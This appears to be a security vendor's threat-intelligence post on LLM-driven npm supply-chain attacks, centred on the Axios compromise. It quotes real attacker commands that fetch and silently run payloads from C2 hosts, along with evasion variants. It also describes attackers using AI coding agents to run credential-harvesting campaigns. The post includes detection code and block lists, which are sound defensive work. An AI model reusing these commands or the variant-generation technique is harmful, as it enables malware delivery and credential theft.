A pattern is emerging in recent CI/CD supply-chain attacks: LLMs running the operator loop, scaling commodity compromises into mass exploitation beyond what a single human operator can achieve. We've observed this in the wild.

Below: what we saw, why it matters, and what to do about it.

Supply Chain Attacks on CI/CD Are Surging

Since September 2025 we have been seeing a spike in supply chain attacks on the CI/CD pipeline. These attacks follow a similar pattern:

- Shai-Hulud (September 2025) - the first self-propagating worm in npm. It steals tokens from CI environments, creates a malicious GitHub Actions workflow on push, and uses stolen credentials to publish infected versions of other packages the same maintainer controls.

- React Native npm compromise (March 2026) - a maintainer account takeover compromised two popular React Native packages (react-native-international-phone-number and react-native-country-select; 130K+ monthly downloads). The same actor rotated through three delivery waves in 48 hours: direct preinstall hook → infrastructure staging → multi-layer dependency chain. The actor used Solana blockchain memos as a censorship-resistant C2 channel (StepSecurity).

- Axios npm compromise (March 2026) - a compromised maintainer published axios@1.14.1 and axios@0.30.4 with the plain-crypto-js dropper. axios is deployed in ~80% of cloud and code environments.

The recipe is consistent: commodity initial access (a CVE, a maintainer compromise, a worm), then mass credential harvesting from .env files, build artifacts, and CI/CD secrets. What has changed is who is running the assembly line.

During the Axios attack we saw something we hadn't seen before.

Evasive Tactics Observed During The Axios Attack

Mate’s AI SOC agents detect, investigate, and hunt for attacks across enterprises. When the Axios compromise first broke, our agents detected and investigated multiple instances of the attack.

At one of these companies, three days after the Axios attack started, Mate’s AI agents detected suspicious activity that turned out to be a second, distinct exploitation attempt against the same npm package. The new variant targeted the same surface but changed enough of its specifics to rule out a replay of the first attack.

Below are the commands used in the first and second attacks. Pay attention to the strings that a static IOC rule would match on. The new variant shifts every one of them but keeps exactly the same operation: download a stage-2 payload from C2, save it to disk, and execute it silently in the background.

Original Attack

macOS

sh -c curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &" &> /dev/null

Windows

"C:\ProgramData\wt.exe" -w hidden -ep bypass -file "C:\Users\$USER$\AppData\Local\Temp\6202033.ps1" "http://sfrclak.com:8000/6202033"

Linux

python3 /tmp/ld.py http://sfrclak.com:8000/6202033

New Variant - same operation, different strings

macOS

sh -c curl --silent --output /private/var/tmp/.upd_cache --data packages.npm.org/check1 http://142.11.206.73:8000/setup.js && chmod 755 /private/var/tmp/.upd_cache && /bin/bash -c "/private/var/tmp/.upd_cache http://142.11.206.73:8000/setup.js &" >/dev/null 2>&1

Windows

"C:\Windows\Temp\dwm.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\$USER$\AppData\Local\Microsoft\Edge\update-check.ps1" "http://142.11.206.73:8000/setup.js"

Linux

python3 /dev/shm/.upd_cache http://142.11.206.73:8000/setup.js

What has changed between the original attack and the new variant:

- Different C2 URL (a raw IP address instead of a domain) and different file names

- Different drop locations (/private/var/tmp instead of /Library/Caches; C:\Windows\Temp instead of C:\ProgramData; tmpfs /dev/shm instead of /tmp)

- Short-form curl and PowerShell flags swapped for long-form equivalents

- Different redirect syntax (&> → > ... 2>&1)

- Different shell on macOS (zsh → bash)

Two attempts against the same target, three days apart, with sufficient tradecraft difference to rule out copy-paste. Manual retooling of a supply-chain exploit at that cadence is uncommon. Model-generated variation against a known target is not.

LLMs can rapidly create multiple variants that will appear different in every exploitation attempt - making their detection virtually impossible when using static rules.

Mate’s AI agents detected the second attempt by treating the variation pattern itself as the signal.
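To make the contrast concrete, here is a minimal Python sketch that compares static IOC matching with behavior matching on the two macOS command lines shown above. The behavior labels and regular expressions are illustrative assumptions chosen for this example, not production detection logic, and a real system would work from process telemetry rather than regexes over a single string.

```python
import re

# The two macOS command lines from this section, as single-line strings.
ORIGINAL = (
    'sh -c curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 '
    '-s http://sfrclak.com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond '
    '&& /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &" '
    '&> /dev/null'
)
VARIANT = (
    'sh -c curl --silent --output /private/var/tmp/.upd_cache --data packages.npm.org/check1 '
    'http://142.11.206.73:8000/setup.js && chmod 755 /private/var/tmp/.upd_cache '
    '&& /bin/bash -c "/private/var/tmp/.upd_cache http://142.11.206.73:8000/setup.js &" '
    '>/dev/null 2>&1'
)

# Static IOC strings taken from the original attack only.
STATIC_IOCS = ["sfrclak.com", "/Library/Caches/com.apple.act.mond", "6202033"]

# Hypothetical behavior heuristics (illustrative assumptions, not production rules).
BEHAVIOR_PATTERNS = [
    ("download_to_disk", re.compile(r"\bcurl\b.*\s(?:-o|--output)\s")),
    ("make_executable", re.compile(r"\bchmod\s+[0-7]{3}\b")),
    ("background_exec", re.compile(r'-c\s+"[^"]*&\s*"')),
    ("silenced_output", re.compile(r"&>\s*/dev/null|>\s*/dev/null\s+2>&1")),
]


def static_match(command: str) -> bool:
    """Return True if any known IOC string appears verbatim in the command."""
    return any(ioc in command for ioc in STATIC_IOCS)


def behavior_chain(command: str) -> tuple[str, ...]:
    """Return the labels of every behavior heuristic the command matches."""
    return tuple(label for label, pattern in BEHAVIOR_PATTERNS if pattern.search(command))


if __name__ == "__main__":
    print("static match:", static_match(ORIGINAL), static_match(VARIANT))
    print("same behavior chain:", behavior_chain(ORIGINAL) == behavior_chain(VARIANT))
```

Under these assumptions, the static rule fires only on the original command, while both commands reduce to the same four-step behavior chain.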

How Can LLMs Unlock Mass Exploitation?



Pre LLM: the Attacker Bottleneck Was Human Triage

Before LLMs were available to attackers, mass exploitation hit a wall at triage. A scanner with over 900 hits is useless if one person can only check ten hits a day: working through that queue alone takes more than 90 days. Pre-LLM operators either kept campaigns small and targeted, or settled for low-value generic post-exploitation.

The human-triage step capped the campaign.

The New Era: LLM is the C2 - The Triage Limitation is Gone



The DFIR Report’s Bissa analysis shows where that bottleneck went. The operator ran Claude Code against the scanner codebase and used a local AI control surface (OpenClaw — websocket gateway, browser control, Telegram bridge) to run the pipeline alone. Each confirmed hit was pushed to Telegram as one structured line: victim, runtime, cloud, recoverable secrets per provider.

Bissa is the documented case (DFIR Report, April 2026).

In the Bissa Scanner example, AI ran a C2 operation that previously required an entire team. That is the shift we are seeing.

Why Speed Matters: the Defender Lag

The exploit window is shrinking. From the moment an attacker has obtained your .env file, this is what the window looks like:

The attacker pivots in minutes. The defender's first signal usually comes from the vendor, not from your SIEM. This window is where harvested keys get used and monetized.

The lag is structural.

Attacker Speed Has Become the Threat

Today's operators iterate exploits within days. The same harness can map attack surfaces (internet-facing services, exposed dependencies, leaked secrets) at the same speed and scale, then auto-target.

More rules won't beat this. You beat it by outpacing attacker speed.

The speed of LLM-assisted iteration has become a threat. CVEs and package compromises will keep landing. The defender problem is no longer preventing every one - it's compressing the time from compromise to action.

Anything slower than the attacker's harness loses.

What You Can Do About This Today

- Do: Wire vendor leaked-secret webhooks into your SIEM: Stripe, AWS, GitHub Push Protection, Anthropic billing, Cloudflare audit log, and Auth0.
  Result: Higher fidelity than internal rules; days earlier.

- Do: Plant canary credentials in common .env paths.
  Result: Highest-fidelity signal for this attack pattern.

- Do: Move secrets out of .env files baked into images. Inject at runtime (Vault, IRSA, Workload Identity). IMDSv2-only on EC2.

- Do: Audit lockfiles for axios@1.14.1 / axios@0.30.4 and Shai-Hulud-tagged repos. Block outbound traffic to s3.filebase.com, api.telegram.org, sfrclak[.]com:8000 from app workloads.
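The lockfile audit in the last item can be scripted. The following is a minimal Python sketch, assuming npm lockfiles in the v2/v3 format, where installed packages are listed under a top-level "packages" map keyed by install path. The function names `find_compromised` and `scan_tree` are hypothetical helpers for this example. Yarn and pnpm lockfiles use different formats and would need their own parsers.

```python
import json
from pathlib import Path

# Compromised releases named in this article.
COMPROMISED = {"axios": {"1.14.1", "0.30.4"}}


def find_compromised(lock: dict) -> list[tuple[str, str]]:
    """Return (install path, version) for each compromised entry in a parsed lockfile."""
    hits = []
    for path, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/axios" or "node_modules/a/node_modules/axios".
        name = meta.get("name") or path.rpartition("node_modules/")[2]
        if meta.get("version") in COMPROMISED.get(name, set()):
            hits.append((path, meta["version"]))
    return hits


def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Scan every package-lock.json under root and report the ones with hits."""
    results = {}
    for lockfile in Path(root).rglob("package-lock.json"):
        hits = find_compromised(json.loads(lockfile.read_text(encoding="utf-8")))
        if hits:
            results[str(lockfile)] = hits
    return results


if __name__ == "__main__":
    for lockfile, hits in scan_tree(".").items():
        print(lockfile, hits)
```

Checking the resolved install paths rather than package.json catches transitive copies of axios pulled in by other dependencies, which a top-level dependency check would miss.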

Agentic Defense Is Key at This Speed

Static IOC matching can't track attacks that iterate at LLM speed. Every rule is valid for one variant. The second variant breaks it.

The question isn't whether AI-assisted attacks are here; Bissa proved that. The question is whether your detection can match the iteration speed.

Agentic SOC systems handle this differently:

- They model behavior, not strings. When an agent sees download-from-C2 → write-to-disk → silent-execute across two attempts with different paths, shells, and flags, it recognizes the pattern. The variation itself is the signal.

- They maintain organizational context. An agent that saw the first Axios variant knows your dependencies and CI/CD pipeline. When the second variant hits, it connects them as a campaign, not two isolated alerts.

- They act autonomously. The agent doesn't wait for a human to write a new rule. It investigates scope, validates impact, and contains the activity, so the investigation is already complete by the time it escalates.
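The "campaign, not two isolated alerts" idea from the list above can be sketched in a few lines of Python. This is a simplified illustration under stated assumptions: the `Alert` fields, the seven-day window, and the grouping key are all hypothetical choices for this example, and a real agent would draw on far richer context.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Alert:
    seen_at: datetime
    package: str               # affected dependency, e.g. "axios"
    behavior: tuple[str, ...]  # normalized behavior chain
    command: str               # raw command line as observed


def correlate(alerts: list[Alert], window: timedelta = timedelta(days=7)) -> list[list[Alert]]:
    """Group alerts that share package and behavior but differ in raw command."""
    groups: dict[tuple, list[Alert]] = defaultdict(list)
    for alert in sorted(alerts, key=lambda a: a.seen_at):
        groups[(alert.package, alert.behavior)].append(alert)

    campaigns = []
    for items in groups.values():
        distinct_commands = {a.command for a in items}
        span = items[-1].seen_at - items[0].seen_at
        # Same behavior, different strings, close in time: variation is the signal.
        if len(distinct_commands) > 1 and span <= window:
            campaigns.append(items)
    return campaigns


if __name__ == "__main__":
    chain = ("download_to_disk", "make_executable", "background_exec")
    day0 = datetime(2026, 1, 1)  # placeholder date, not taken from the incident
    alerts = [
        Alert(day0, "axios", chain, "curl -o /tmp/a ..."),
        Alert(day0 + timedelta(days=3), "axios", chain, "curl --output /tmp/b ..."),
    ]
    print(len(correlate(alerts)))
```

Requiring more than one distinct raw command means an exact replay is left to ordinary IOC rules, while this grouping targets the retooled variants those rules miss.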

When operators iterate variants in days, your detection window is hours. Anything slower loses.

Related Attacks Indicators of Compromise

References

- The DFIR Report: Bissa Scanner Exposed (April 2026)

- Wiz Research: Axios NPM Distribution Compromised (March 2026)

- StepSecurity: Malicious npm Releases Found in Popular React Native Package (March 2026)

- Unit 42: "Shai-Hulud" Worm Compromises npm Ecosystem (September 2025)